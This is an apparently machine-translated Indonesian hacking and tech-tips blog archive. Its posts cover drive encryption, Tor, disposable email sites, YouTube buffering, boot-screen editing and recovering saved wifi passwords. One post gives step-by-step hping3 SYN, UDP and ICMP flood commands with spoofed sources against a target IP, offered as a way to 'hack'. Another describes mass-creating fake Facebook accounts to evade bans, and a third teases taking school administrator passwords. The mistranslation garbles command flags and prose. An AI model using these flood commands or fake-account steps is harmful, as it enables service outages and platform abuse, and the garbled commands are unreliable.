Thursday, December 19, 2019

Cara Melindungi Drive Hard Disk Eksternal Dengan Kata Sandi

Saatnya untuk melindungi Hard Drive eksternal Anda dengan enkripsi untuk mengamankan data Anda dari akses yang tidak sah. Kami akan membagikan dua metode yang akan membantu Anda melindungi Drive Hard Disk Eksternal Anda dengan kata sandi. Pergi melalui pos untuk mengetahuinya.

S ecurity selalu menjadi prioritas pertama untuk setiap pengguna dan ketika itu tentang beberapa data pribadi maka itu menjadi lebih penting. Jika kita berbicara tentang hard drive eksternal di mana Anda menyimpan banyak data pribadi sama sekali tidak aman, karena siapa pun dapat membawa drive portabel Anda dan dapat melakukan tindakan ilegal. Namun, itu bisa dilindungi kata sandi, Anda dapat mengatur kata sandi yang Anda inginkan untuk membuka kunci drive eksternal di komputer mana pun. Jadi lihat panduan lengkap yang dibahas di bawah ini untuk melindungi drive eksternal Anda dengan kata sandi keamanan.

Kami telah menyebutkan dua metode di bawah ini, satu didasarkan pada pengaturan sistem yang akan memungkinkan Anda untuk mengunci drive Anda dengan kata sandi tanpa memerlukan alat pihak ketiga. Padahal, yang lain membutuhkan alat pihak ketiga untuk melindungi drive Anda dengan kata sandi. Cukup ikuti beberapa langkah sederhana di bawah ini untuk melanjutkan.

Langkah-langkah Untuk Mengamankan Hard Drive Eksternal Anda Dengan BitLocker:


Langkah 1.  Pertama-tama, hubungkan hard drive eksternal Anda ke PC Windows Anda dan nyalakan. Sekarang klik tombol Start dan kemudian arahkan ke  Control Panel -> BitLocker Drive Encryption.




Langkah 2.  Secara default, BitLocker akan “Off” Anda harus  Mengaktifkan BitLocker  untuk drive yang ingin Anda enkripsi.



Langkah 3.  Sekarang centang pada " Gunakan Kata Sandi untuk Membuka Kunci Drive " pilihan di sana dan masukkan kata sandi yang sama di kedua bidang dan kemudian klik " Next ".


Langkah 4.  Sekarang waktunya untuk menyimpan kunci Anda di suatu tempat untuk itu klik " Simpan Kunci Pemulihan ke File, " dan kemudian pilih lokasi mana pun di mana Anda ingin menyimpan kunci Anda untuk referensi di masa mendatang dan kemudian lanjutkan dengan mengklik tombol berikutnya.


Langkah 5.  Sekarang klik pada  opsi Mulai Enkripsi  dan tunggu proses untuk menyelesaikan dan dapat memakan waktu untuk menyelesaikan tergantung pada ukuran drive. Setelah selesai.


Itu dia! Anda selesai, sekarang Anda mengemudi akan selalu memerlukan kata sandi untuk mengakses file di dalamnya.

Langkah-langkah Untuk Melindungi Kata Sandi Drive Eksternal Anda Dengan StorageCrypt


Langkah 1.  Pertama-tama di PC Windows Anda unduh dan instal alat  StorageCrypt . Sekarang luncurkan alat dan kemudian hubungkan drive Anda ke PC.

Langkah 2.  Sekarang di alat, pilih perangkat Anda untuk mengenkripsi dengan kata sandi. Sekarang pilih mode cepat dan kemudian lindungi drive Anda dengan kata sandi yang Anda inginkan dan kemudian klik "mengenkripsi"


Itu dia! Anda selesai, sekarang drive Anda akan selalu memerlukan kata sandi untuk mengakses file di dalamnya.

Menggunakan Perangkat Lunak Lainnya:Veracrypt



VeraCrypt menambahkan keamanan yang ditingkatkan untuk algoritma yang digunakan untuk enkripsi sistem dan partisi yang membuatnya kebal terhadap perkembangan baru dalam serangan brute-force. Itu dapat mengenkripsi hard disk eksternal Anda dan bahkan dapat mengenkripsi partisi windows Anda.

DiskCryptor


DiskCryptor adalah solusi enkripsi terbuka yang menawarkan enkripsi semua partisi disk, termasuk partisi sistem. Fakta keterbukaan sangat kontras dengan situasi saat ini, di mana sebagian besar perangkat lunak dengan fungsionalitas yang sebanding sepenuhnya milik, yang membuatnya tidak dapat diterima untuk digunakan untuk melindungi data rahasia.

Cryptainer LE


Perangkat Lunak Enkripsi Gratis untuk melindungi data rahasia Anda di PC Windows, Desktop, Laptop, Hard Disk atau Drive yang Dapat Dilepas seperti USB Flash Drive, Memory Stick. Cryptainer memungkinkan Anda melindungi kata sandi dan mengamankan file atau folder apa pun di media apa pun, termasuk drive yang dapat dilepas (Flash Drive, Hard disk eksternal, CD ROM, dll.)

SafeHouse Explorer

SafeHouse Explorer dapat melindungi file yang berada di drive apa pun, termasuk stik memori, drive USB eksternal, server jaringan, CD / DVD, dan bahkan iPod. SafeHouse Explorer menggunakan kata sandi dan enkripsi lanjutan 256-bit berkekuatan maksimum untuk sepenuhnya menyembunyikan dan mempertahankan file sensitif Anda.

File Secure


File Secure free adalah perangkat lunak terbaik lain yang memungkinkan Anda melindungi hard disk eksternal Anda dengan kata sandi. Anda dapat menggunakan File Secure gratis untuk mengunci file sensitif Anda dengan kata sandi yang solid yang akan membatasi pengguna lain mengakses tanpa kata sandi.

Keamanan file menggunakan algoritme enkripsi AES dari standar militer untuk melindungi hard drive eksternal Anda seperti hard drive, flash drive, dll.



Jika Anda mencari alat enkripsi file sumber terbuka terpercaya, maka tidak ada yang bisa mengalahkan AxCrypt. Ini adalah salah satu perangkat lunak enkripsi terkemuka yang dapat Anda gunakan pada sistem operasi Windows untuk melindungi drive USB Anda atau hard drive eksternal dengan kata sandi.

Perangkat lunak ini hadir secara gratis dan menyediakan salah satu cara termudah untuk mengenkripsi file individual di sistem operasi Windows. Axcrypt juga memiliki beberapa fitur canggih yang terintegrasi dengan Windows.

Sunday, November 17, 2019

Segalanya Tentang Tor: Apa itu Tor ? Bagaimana Tor Bekerja ?

tor-onion Tor or The Onion Router, memungkinkan penggunaan anonim dari kerudung internet identitas pengguna yang sebenarnya. Ini melindungi pengguna dari setiap analisis lalu lintas dan jaringan mata-mata. Tor mungkin merupakan opsi paling populer dan aman yang tersedia untuk konektivitas internet anonim.

Dari mana asalnya?

Tor didasarkan pada prinsip 'onion routing' yang dikembangkan oleh Paul Syverson, Michael G. Reed dan David Goldschlag di Laboratorium Penelitian Angkatan Laut Amerika Serikat pada 1990-an. Versi alpha Tor bernama 'The Onion Routing Project' atau hanya Proyek TOR dikembangkan oleh Roger Dingledine dan Nick Mathewson, diluncurkan pada 20 September 2002. Pengembangan lebih lanjut dilakukan di bawah atap keuangan Electronic Frontier Foundation (EFF).

Tor Project Inc. adalah organisasi nirlaba yang saat ini mengelola Tor dan bertanggung jawab atas pengembangannya. Ini terutama didanai oleh Pemerintah Amerika Serikat, bantuan lebih lanjut disediakan oleh Pemerintah Swedia dan berbagai LSM & sponsor individu.

Bagaimana itu bekerja?

Tor bekerja pada konsep metode 'onion routing' di mana data pengguna pertama kali dienkripsi, dan kemudian ditransfer melalui berbagai relay yang ada di jaringan Tor, sehingga menciptakan enkripsi berlapis-lapis (lapisan seperti bawang), sehingga menjaga identitas dari pengguna yang aman. Pada setiap relai, satu layer didekripsi dan data yang tersisa diteruskan ke relai acak apa pun hingga mencapai server tujuannya. Untuk server tujuan, relai simpul / keluar Tor terakhir muncul sebagai asal data. Karenanya sangat sulit untuk melacak identitas pengguna atau server oleh sistem pengawasan yang bertindak di tengah jalan.

Selain memberikan anonimitas kepada pengguna mandiri, Tor juga dapat memberikan anonimitas ke situs web dan server yang masuk dalam kategori layanan tersembunyi. Selain itu, aplikasi P2P seperti Bittorrent dapat dikonfigurasi untuk menggunakan jaringan dan mengunduh file torrent.

Kontroversi dan Pengaruh:


Tor telah dipuja karena anonimitas dan privasi yang diberikannya kepada pengguna yang ingin memintas sensor, yang dilecehkan dan trauma oleh penguntit dan aktivis sosial yang takut ditangkap oleh pihak berwenang. Ini telah digunakan oleh agen keamanan yang berbeda untuk berbagi informasi rahasia.

Edward Snowden, Whistle Blower, menggunakan Tor untuk membocorkan informasi tentang PRISM kepada The Guardian dan The Washington Post.

Tor telah dikritik karena alasan itu bertindak sebagai media untuk berbagai kegiatan ilegal seperti pelanggaran data, perdagangan narkoba, perjudian dll. Tor juga digunakan oleh orang jahat untuk berkomunikasi melalui internet sambil menjaga identitas mereka disembunyikan yang membuat sulit bagi agen keamanan untuk melacak mereka.

Badan Keamanan Nasional AS (NSA) telah menyebut Tor "raja anonimitas Internet dengan keamanan tinggi, latensi rendah" dan komentar serupa oleh majalah BusinessWeek, "mungkin cara yang paling efektif untuk mengalahkan upaya pengawasan online agen intelijen di seluruh dunia ”

Spekulasi lain yang dibuat adalah bahwa Tor mengambil dana dari Pemerintah AS yang dapat mengarah pada asumsi bahwa NSA mungkin telah mengkompromikan identitas masing-masing pengguna Tor, tetapi direktur eksekutif Andrew Lewman telah menolak setiap konfederasi dengan NSA.

Bisakah itu dikompromikan?

Berbagai klaim telah dibuat untuk mengkompromikan anonimitas dan keamanan Tor dari waktu ke waktu. Yang paling terkenal adalah Bad Apple Attack di mana para peneliti mengklaim telah mengidentifikasi sekitar 10 ribu alamat IP pengguna Bittorrent aktif yang terhubung melalui Tor.

Kompromi terkenal lainnya dilakukan oleh bug Heartbleed pada bulan April 2014 yang menghentikan jaringan Tor selama beberapa hari.

Fingerprinting Lalu Lintas adalah metode yang digunakan untuk menganalisis lalu lintas web dengan menganalisis pola, respons, dan paket dalam arah tertentu. Ini dapat digunakan untuk menyerang jaringan Tor dengan menjadikan komputer penyerang bertindak sebagai penjaga.
Kerentanan utama yang ditemukan adalah pada titik keluarnya di mana tingkat keamanan sangat rendah dibandingkan dengan sisa jaringan Tor.

Produk berdasarkan Tor:


Tor Project Inc. telah merilis Tor Browser yang merupakan modifikasi dari versi Extended Support Release dari browser Mozilla Firefox. Browser ini dibuat portabel sehingga dapat digunakan dari media eksternal dan mengurangi bahaya instalasi. Ini menghapus riwayat pengguna setelah setiap kali digunakan, sehingga mengurangi risiko segala jenis pelacakan cookie.

Produk lain seperti Orbot - versi Android Tor, Orfox - versi seluler Tor Browser dikembangkan oleh The Guardian Project yang merupakan komunitas pengembang global yang didirikan oleh Nathan Freitas.

Kita dapat mengatur aplikasi berbasis SOCKS (Socket Secure) untuk menggunakan jaringan Tor dengan mengonfigurasinya dengan alamat loop-back.
 
Alternatif Tor:

Hornet adalah jaringan anonimitas baru yang memberikan kecepatan jaringan lebih tinggi dibandingkan dengan Tor. I2P, Tails, SubgraphOS, Freenet dan Freepto adalah alternatif teratas lainnya yang dapat digunakan.
 
Berakhir:

Tor telah terbukti menjadi media hebat untuk keberadaan web yang aman, aman, dan anonim yang dapat diberikan kepada pengguna tanpa biaya. Meskipun tersedia untuk niat positif, tetapi juga digunakan oleh orang-orang ganas dalam memenuhi kebutuhan mereka. Proyek Tor telah mengarah pada pendekatan optimis terhadap sensor dan internet tanpa pengawasan.

Untuk ide lebih lanjut tentang 'Bagaimana Tor bekerja', silakan lihat videonya:

Situs Peretas Terbaik Di Dark Net

Cara Mengakses Deep Web atau DarkNet


Web yang dalam bukan lokasi tunggal, tetapi seluruh kelas dari lokasi yang berbeda yang memiliki satu kesamaan - bahwa mereka disembunyikan dari mesin pencari dan pengguna internet biasa. Karena itu, area berbeda dari web yang dalam memiliki persyaratan berbeda agar Anda dapat mengaksesnya, dan teknologi apa pun yang Anda gunakan hanya akan memberi Anda akses ke area spesifik dari internet yang tersembunyi. Karena itu, ada sejumlah kecil teknologi yang digunakan untuk membuat apa yang secara populer disebut 'web dalam' atau 'darknet', dan satu khususnya yang digunakan sebagian besar orang - TOR.

Situs Peretasan Terbaik di The Dark Net: -

Bagaimana Seperti Peretas dan Apa yang Mereka Pikirkan ?

Hampir semua peretas menyelesaikan kuliah atau mencapai tingkat itu dengan belajar sendiri. Peretas yang belajar sendiri lebih dihormati di komunitas peretas karena orang itu benar-benar tertarik pada peretasan dan dia melewati banyak hal yang tidak diajarkan di sekolah dan kampus.

Hal yang paling umum dilakukan peretas adalah teknik elektro komputer, fisika, matematika, linguistik dan filsafat. Namun, seperti setiap pengembang bukan hacker, peretas tidak selalu memiliki keterampilan pemrograman, tetapi seseorang dari mereka memilikinya.

Gaya pakaian: Peretas berpakaian sederhana, santai: jeans, T-shirt dan sepatu. T-shirt biasanya dengan beberapa slogan lucu. Pada tahun 1990, mereka mendistribusikan T-shirt dengan citra komputer, tetapi ketika budaya hacker akhirnya mengembangkan simbol mereka sendiri, hari ini ada T-shirt dengan gambar Penguin (merek dagang Linux) atau daemon (BSD). Sejumlah kecil peretas lebih suka sepatu hiking. Setelah 1995, peretas jatuh di bawah pengaruh subkultur punk, gothic dan rave. Ini tercermin dari pemakaian baju hitam. Peretas lebih peduli pada kenyamanan, kepraktisan, dan kemudahan perawatan pakaian. Mereka membenci pakaian bisnis.

BUNGA LAIN: Hobi yang dilakukan peretas tersebar luas. Kebanyakan mereka menyukai fiksi ilmiah, musik, abad pertengahan, catur, permainan perang, dan permainan intelektual dari semua jenis, teka-teki logis, dan bidang lain yang terkait erat dengan peretasan atau yang mencakup linguistik dan akting.

Peretas lebih suka kucing daripada anjing. (Dipercaya secara luas bahwa kucing memiliki sifat peretas). Sejumlah besar peretas selalu lupa mencuci mobil. Mereka lebih suka Porsche modern kaya atau RX-7, tetapi mereka lupa untuk mencuci. Semua peretas memiliki tulisan tangan yang mengerikan .

Terganggu oleh orang-orang bodoh, tidak suka mendengarkan musik lembut, atau menonton televisi, kecuali kartun dan film fiksi ilmiah. Mereka membenci kebohongan, ketidakmampuan dan kebosanan.

AKTIVITAS DAN OLAHRAGA: Jumlah terbesar peretas pada umumnya tidak terlibat dalam kegiatan fisik. Di antara mereka yang berlatih, minat dalam olahraga tidak besar. Hindari olahraga tim. Olahraga peretas selalu bersifat individu, termasuk konsentrasi dan kemampuan: bersepeda, balap mobil, skating, berlayar, hiking, meluncur ... Hanya untuk menyebutkan, tim HaCoder bermain sepak bola dan sepak bola gaya bebas, tetapi tidak suka menontonnya di TV.

Sebagian besar peretas tidak menggunakan rokok dan alkohol. Pada tahun 1995, ada kecenderungan untuk minum bir eksotis, dipengaruhi oleh Linus Torvalds yang menyukai Guinness. Terbatasnya penggunaan kanabis, LSD, Nitrus oksida sekali lagi diterima. Di sisi lain mereka tidak suka menggunakan obat-obatan karena kerusakan otak. Kebanyakan peretas menggunakan kopi dan / atau gula atau soda (Coke) untuk tetap terjaga sepanjang malam selama peretasan.

cara membuat email dalam hitungan detik


gunakan situs web paling keren ini..jika kamu membutuhkan email palsu..untuk keperluan apa pun !!! .. kamu bisa melanjutkan itu dan kamu akan mendapatkan email palsu kamu di sana .. !!!

di sini ada tautan: -

http://10minutemail.com/
https://emkei.cz/

www. fakemail generator.com/

http: //www.throwaway mail .com /

en.email-fake.com/

www. kotak masuk palsu.com/

https://mailinator.com/

mati palsu .com /

mail drop.cc/

http://www.anony mail er.net/

https://www.guerrillamail.com/

klik saja tautan ini;) ... dan Anda akan mendapatkan email Anda ... tetapi beberapa dari mereka hanya untuk 10 menit ... jadi jangan gunakan email ini untuk tujuan administrasi seperti di sekolah, kolase, kantor dll.

Nikmati :)

Saturday, November 16, 2019

Apa itu serangan DOS dan cara Meretas menggunakan DOS



Kawan, Anda mungkin pernah melihat Tn. Robot dan mengingat peristiwa ketika Masyarakat menggunakan DDoS sebagai kartu panggil untuk memikat Elliot agar membantu mereka menurunkan E-Corp atau Anda mungkin dikejutkan dalam situasi ketika Anda mencoba membuka Website hanya untuk lihat pemberitahuan bahwa Situs web sedang down. Apa ini? Ya, ini adalah Serangan DOS.

Serangan denial of service (DoS) adalah serangan yang menyumbat begitu banyak memori pada sistem target sehingga tidak dapat melayani penggunanya, atau menyebabkan sistem target macet, reboot, atau menolak layanan untuk pengguna yang sah. Ada beberapa jenis serangan dos seperti yang dibahas di bawah ini: -

1) Ping Of Death : - Ping of death attack mengirimkan ICMP oversized datagrams (dikemas dalam paket IP) kepada korban. Perintah Ping memanfaatkan permintaan gema ICMP dan gema pesan balasan dan biasanya digunakan untuk menentukan apakah host jarak jauh hidup. Namun, dalam ping serangan kematian, ping menyebabkan sistem jarak jauh hang, reboot atau crash. Untuk melakukannya, penyerang menggunakan, perintah ping bersamaan dengan argumen -l (digunakan untuk menentukan ukuran paket yang dikirim) untuk melakukan ping ke sistem target yang melebihi byte maksimum yang diizinkan oleh TCP / IP (65.536).
contoh: - c: /> ping -l 65540 nama host
Untungnya, hampir semua sistem operasi saat ini tidak rentan terhadap serangan ping kematian.

2) Teardrop Attack : - Setiap kali data dikirim melalui internet, ia dipecah menjadi beberapa bagian di sistem sumber dan dipasang kembali di sistem tujuan. Misalnya, Anda perlu mengirim 3.000 byte data dari satu sistem ke sistem lainnya

3) SYN - Flood Attack: - Dalam serangan flooding SYN, beberapa paket SYN dikirim ke host target, semua dengan alamat IP sumber tidak valid. Ketika sistem target menerima paket-paket SYN ini, ia mencoba untuk menanggapi masing-masing dengan paket SYN / ACK tetapi karena semua alamat IP sumber tidak valid, sistem target masuk ke keadaan menunggu untuk pesan ACK untuk menerima dari sumber. Akhirnya, karena sejumlah besar permintaan koneksi, memori sistem target dikonsumsi . Untuk benar-benar mempengaruhi sistem target, sejumlah besar paket SYN dengan alamat IP yang tidak valid harus dikirim.

4) Serangan Tanah : - Serangan darat mirip dengan serangan SYN, satu-satunya perbedaan adalah bahwa alih-alih memasukkan alamat IP yang tidak valid, paket SYN termasuk alamat IP dari sistem target itu sendiri. Akibatnya, infinite loop dibuat di dalam sistem target, yang akhirnya hang dan crash. Windows NT sebelum Paket Layanan 4 rentan terhadap serangan ini.

5) Smurf Attack : - Ada 3 pemain dalam serangan smurf - penyerang, perantara (yang juga bisa menjadi korban) dan korban. Dalam sebagian besar skenario, penyerang memalsukan alamat sumber IP sebagai IP korban yang dituju untuk alamat penyiaran jaringan perantara. Setiap host di jaringan perantara membalas, membanjiri korban dan jaringan perantara dengan lalu lintas jaringan.
Hasil: - Performa dapat menurun sehingga korban, korban dan jaringan perantara menjadi macet dan tidak dapat digunakan, yaitu menyumbat jaringan dan mencegah pengguna yang sah mendapatkan layanan jaringan.

Serangan DOS

6) UDP - Flood Attack : - Dua layanan UDP: gema (yang menggemakan kembali semua karakter yang diterima) dan chargen (yang menghasilkan karakter) digunakan di masa lalu untuk pengujian jaringan dan diaktifkan secara default pada sebagian besar sistem. Layanan ini dapat digunakan untuk meluncurkan serangan DOS dengan menghubungkan chargen ke port echo pada mesin yang sama atau yang lain dan menghasilkan sejumlah besar lalu lintas jaringan .

Distributed Denial Of Service (DDoS):


Dalam serangan DoS Terdistribusi, ada 100 atau lebih penyerang (sistem) yang berbeda menyerang sistem tunggal. Karena jumlah penyerang yang lebih tinggi, serangan DDoS lebih efektif dan berbahaya daripada serangan DoS biasa. Para penyerang memiliki kontrol atas zombie induk, yang, pada gilirannya, memiliki kontrol atas zombie budak, seperti yang ditunjukkan pada gambar.

Tidak ada sistem yang terhubung ke internet aman dari serangan DDoS. Semua platform, termasuk Unix dan Windows NT, rentan terhadap serangan semacam itu. Bahkan mesin Mac OS telah digunakan untuk melakukan serangan DDoS.

Alat serangan DDoS dan dos yang paling populer adalah: -

a) Trin00 (WinTrinoo)
b) Tribe Flood Network (TFN) (TFN2k)
c) Shaft
d) LOIC(LOW ORBIT ION CANNON)
e) XOIC

Tidak ada perangkat lunak, Anda ingin mencobanya sendiri, Anda dapat menggunakan HPING (telah diinstal sebelumnya dalam KALI LINUX).

ATAU

Unduh hping dari www. hping .org

Langkah-langkah untuk meretas menggunakan serangan DOS:


Buka konsol dan pergi ke jalan hping3 dan berikan perintah berikut.

hping3 –merek sumber –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (set nilai dengan mengganti 0) dengan sumber acak.

hping3 –merek sumber –SA –p <port terbuka> <target IP>

Di sini kami mengirim paket SYN + ACK dari sumber acak.

hping3 –merek sumber-–udp <target IP> –flood

Membanjiri IP target dengan paket UDP.

hping3 –merek sumber –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirim paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Membanjiri paket ICMP dengan spoofed IP (–spoof).

Buka konsol dan pergi ke jalan hping3 dan berikan perintah berikut.

hping3 –merek sumber –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (set nilai dengan mengganti 0) dengan sumber acak.

hping3 –merek sumber –SA –p <port terbuka> <target IP>

Di sini kami mengirim paket SYN + ACK dari sumber acak.

hping3 –merek sumber-–udp <target IP> –flood

Membanjiri IP target dengan paket UDP.

hping3 –merek sumber –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirim paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Membanjiri paket ICMP dengan spoofed IP (–spoof).

Friday, November 15, 2019

Cara Memutar Video YouTube Lebih Cepat Tanpa Buffering

youtube super cepat


Hari ini ada jutaan orang yang menghabiskan waktu mereka di youtube menonton video online . Dan seperti yang kita semua ketahui, YouTube adalah jaringan streaming video terbesar di mana Anda tidak diragukan lagi dapat menonton semua video kesayangan Anda secara online. Namun masalah utama dengan video youtube adalah kecepatan buffering mereka.

Hari ini kita akan berbagi trik tentang Buffering video Youtube Anda lebih cepat daripada kecepatan standar. Pergi melalui pos lengkap untuk mengetahui lebih banyak tentang hal itu.

Jadi untuk menyimpulkan masalah ini, saya di sini tentang metode untuk buffer video youtube lebih cepat dari kecepatan standar. Sebenarnya, buffering ini tidak tergantung secara eksklusif pada kecepatan internet karena pasti ada lebih banyak hal yang dapat mempengaruhinya. Jadi dengan metode di bawah ini Anda dapat menyelesaikannya dan dapat menyangga video youtube lebih cepat.

Di bawah ini adalah metode untuk menonton video youtube lebih cepat Ikuti langkah-langkah di bawah ini untuk melanjutkan:


Langkah 1. Pertama-tama unduh dan instal ekstensi SmartVideo untuk YouTube di Google chrome atau Mozilla Firefox Anda . Saya akan menunjukkan kepada Anda tutorial lengkap tentang Google Chrome karena banyak dari kita kebanyakan lebih suka Google chrome.

Langkah 2. Sekarang setelah instalasi memutar video apa pun di YouTube dan kemudian Anda akan dapat melihat beberapa opsi tambahan di bawah video yang diputar. Anda hanya perlu memindahkan kursor Mouse Anda di antara video youtube dan Anda dapat melihat sebuah kotak persegi panjang muncul.

Langkah 3. Sekarang klik pada Preferensi Global di sisi kanan video Anda, Kemudian centang kotak Smart Buffer Box. Anda tidak perlu melakukan hal lain di sini.

Langkah 4. Sekarang, itu akan memaksa buffer video YouTube Anda . Itu dia! Anda akan melihat video youtube Anda akan buffer lebih cepat dan menikmati pengalaman streaming video berkecepatan tinggi melalui youtube.

Jadi di atas adalah semua tentang Cara Buffer Youtube Video Faster . Dengan metode ini, Anda dapat dengan mudah meningkatkan memori buffer dan memaksa youtube untuk mengirim data lebih lanjut di ruang buffer Anda dan Anda akan dapat menonton video youtube lebih cepat dari kecepatan normal. Jadi nikmati pengalaman streaming video yang lebih baik dengan metode ini.

Trik Membuat Akun Facebook Terverifikasi Tidak Terbatas

Langkah 1: Pertama, buka http://m.facebook.com dan kemudian klik "Buat Akun Baru"

Langkah 2: Isi formulir lengkap (gunakan http://fakenamegenerator.com/ )


Di bagian “Email atau Telepon” gunakan email dari http://10minutemail.com/

Langkah 3: Tekan "Daftar" dan kemudian kunjungi http://10minutemail.com/ untuk mendapatkan verifikasi email dari Facebook (Tekan F5 sampai Anda melihatnya) gunakan KODE itu untuk mengaktifkan akun Anda.

CATATAN: Akun Anda mungkin dicekal dalam sehari, jadi pastikan Anda memberikan identitas yang sesuai (perguruan tinggi, sekolah, tempat tinggal ...) dan jangan lupa mengunggah foto profil untuk menjaga masa pakai akun Anda lebih lama .

Wednesday, November 13, 2019

Cara Mengubah Layar Boot di PC Windows Anda



Untuk pengguna windows, kami di sini Cara Mengganti Layar Boot di PC Windows Anda . Saat booting di PC windows Anda, Anda melihat proses memuat windows default yang dengan layar boot windows default. Namun tampilan layarnya cukup membosankan karena menonton layar yang sama berulang-ulang tidak keren. Tapi ini bisa diubah, ya adalah mungkin untuk mengubah layar Boot Anda dan Anda dapat menggantinya dengan yang sangat keren yang Anda ingin miliki. Jadi, lanjutkan dengan panduan lengkap di bawah ini.

Cara Mengubah Layar Boot di PC Windows Anda


Metode ini sangat sederhana dan dapat dilakukan dengan menggunakan satu jendela tweak yang akan mengubah file layar boot default Anda dan menggantinya dengan yang sangat keren yang pasti akan Anda sukai alih-alih membosankan. Jadi, lanjutkan dengan langkah-langkah di bawah ini.

Langkah-langkah Untuk Menyesuaikan Layar Boot Di Windows


  1. Pertama-tama Anda perlu membuat cadangan file sistem layar boot windows Anda untuk itu pergi ke My Computer > C: / > Windows > System32 .
  2. Sekarang di sana Anda akan melihat salin file ntoskrnl.exe dan tempel file di lokasi lain dari komputer Anda.
  3. Sekarang unduh dan instal Resource Hacker di komputer Anda.
  4. Sekarang setelah mengunduh dan menginstal, luncurkan alat di PC windows Anda 11
  5. Sekarang dalam program klik pada File dan kemudian pilih opsi Open dan kemudian cari file ntoskrnl.exe .
  6. Sekarang ketika file dibuka klik pada tombol Action di sana dan kemudian pilih ganti opsi Bitmap.
  7. Sekarang pilih salah satu layar yang Anda inginkan dan kemudian klik tombol OK .
  8. Sekarang klik pada tombol File dan kemudian pilih opsi Simpan Sebagai .
  9. Dan sekarang simpan file tersebut sebagai ntoskrnl.exe .
  10. Sekarang, matikan PC Anda dan kemudian mulai dalam mode Aman.
  11. Sekarang salin file ntoskrnl.exe yang Anda buat dan rekatkan ke C: / > Windows > System32 . 22
  12. Sekarang restart komputer Anda dalam mode normal.
  13. Itu sudah selesai, dengan ini layar boot Anda diubah dengan gambar yang luar biasa yang telah Anda pilih.

Jadi di atas adalah semua tentang Cara Mengubah Layar Boot di PC Windows Anda . Dengan ini, Anda dapat dengan mudah mendapatkan tampilan baru di windows Anda dan dapat menyingkirkan tampilan default yang Anda tidak ingin kembali lagi setelah windows keren ini mengubah. Semoga Anda menyukai ini, bagikan ini juga dengan orang lain. Tinggalkan komentar di bawah jika Anda memiliki pertanyaan terkait dengan ini.

Cara Meretas Command Prompt di sekolah untuk mengubah kata sandi dan banyak lagi

Mencoba fokus mempelajari akhir Stats di perpustakaan tetapi mendapatkan mantra ADD serius? Kemudian manfaatkan waktu Anda - sambil bersenang-senang dengan siapa pun yang ada di perpustakaan - dengan meretas command prompt komputer Anda. Command prompt adalah sistem operasi paling dasar yang dijalankan oleh komputer Anda, dan video ini akan mengajarkan Anda cara untuk mematikan komputer teman Anda atau bahkan mendapatkan dan mengubah kata sandi administrator.

Sunday, November 10, 2019

Pulihkan Kata Sandi WiFi Menggunakan Android



Ketika perangkat mana pun terhubung ke jaringan wifi maka kata sandi wifi disimpan dalam perangkat itu untuk sementara waktu sampai perangkat itu tetap terhubung ke jaringan itu. Dan di Android, kata sandi wifi ini disimpan dalam file sistem yang tidak dapat diakses langsung ke perangkat Anda tanpa memiliki akses root pada perangkat Android Anda. Jadi dalam panduan ini, kita akan membahas hal yang sama dengan mana Anda dapat dengan mudah memulihkan kata sandi jaringan wifi yang Anda lupa. Satu-satunya persyaratan adalah bahwa Android Anda harus terhubung ke jaringan wifi di masa lalu.

Di sini kami telah menyatakan dua aplikasi android keren yang hanya bekerja dengan android yang di-rooting dan dengan itu, Anda benar-benar dapat mengekstrak semua kata sandi yang disimpan di perangkat Anda ketika terhubung ke jaringan wifi. Jadi ikuti beberapa langkah sederhana di bawah ini untuk melanjutkan. Metode ketiga tidak memerlukan perangkat android yang di-rooting.

# 1 Menggunakan Pemulihan Kunci WiFi:


Langkah 1. Pertama-tama, Anda perlu me-rooting android Anda karena aplikasi hanya akan berfungsi jika Anda memiliki akses rooting ke perangkat Anda, jadi kunjungi panduan Root semua android dengan aman .


Langkah 2. Setelah melakukan rooting, unduh perangkat Anda dan instal aplikasi Wifi Key Recovery di android Anda

Langkah 3. Sekarang buka aplikasi dan Anda akan melihat popup tentang izin akses pengguna super memberikan izin.








Langkah 4. Sekarang Anda akan melihat semua jaringan wifi yang Anda sambungkan ke perangkat Android Anda dan kata sandi mereka juga.

Langkah 5. Sekarang cukup salin kata sandi dan dapatkan login ke wifi itu dan kata sandinya akan dipulihkan dan Anda sekarang bahkan dapat mengubah kata sandi jaringan itu dengan mengunjungi panel admin jaringan.

# 2 Menggunakan Aplikasi Pemulihan Kata Sandi Wifi


Langkah 1. Pertama-tama, Anda perlu mengunduh Wifi Password Recovery App di ponsel pintar Android Anda yang sudah di-root. 



Langkah 2. Setelah Anda menginstalnya di perangkat android Anda, pada langkah selanjutnya Anda harus memberikan Izin Root .




Langkah 3. Sekarang Anda dapat melihat semua kata sandi wifi tersimpan Anda terdaftar dengan SSID Name and Pass . Jika Anda ingin menyalin kata sandi cukup ketuk pada jaringan dan kemudian pilih " Salin kata sandi ke clipboard"

Itu saja sudah selesai! ini adalah cara termudah untuk mengetahui kata sandi wifi yang tersimpan di ponsel pintar android Anda.

# 3 Menggunakan ES File Explorer


Langkah 1. Pertama-tama, Anda memerlukan file explorer yang memberi Anda akses baca ke folder root . Jika Manajer file default Anda tidak memberi Anda akses baca ke folder root maka Anda dapat menginstal ES File Explorer.

Sekarang Anda perlu menuju ke folder data / misc / wifi dan Anda akan menemukan file bernama wpa_supplicant.conf.

Langkah 2. Anda perlu membuka file dan pastikan Anda menggunakan penampil teks / HTML bawaan ES File Explorer untuk tugas tersebut. Sekarang dalam file ini, Anda akan dapat melihat SSID jaringan dan kata sandi mereka di sebelahnya.

Sekarang Anda perlu mencatat nama jaringan dan kata sandinya . Dengan cara ini, Anda dapat melihat semua kata sandi wifi yang tersimpan di perangkat android.

Catatan: Harap jangan mengedit apa pun di wpa_supplicant.conf karena dapat mengubah perangkat Anda berfungsi atau itu akan memiliki efek konektivitas wifi Anda.

Jadi cukup pulihkan kata sandi WiFi Anda menggunakan trik ini. Semoga Anda menyukai metode keren ini, berbagi juga dengan orang lain.

Thursday, November 7, 2019

Virus Notepad



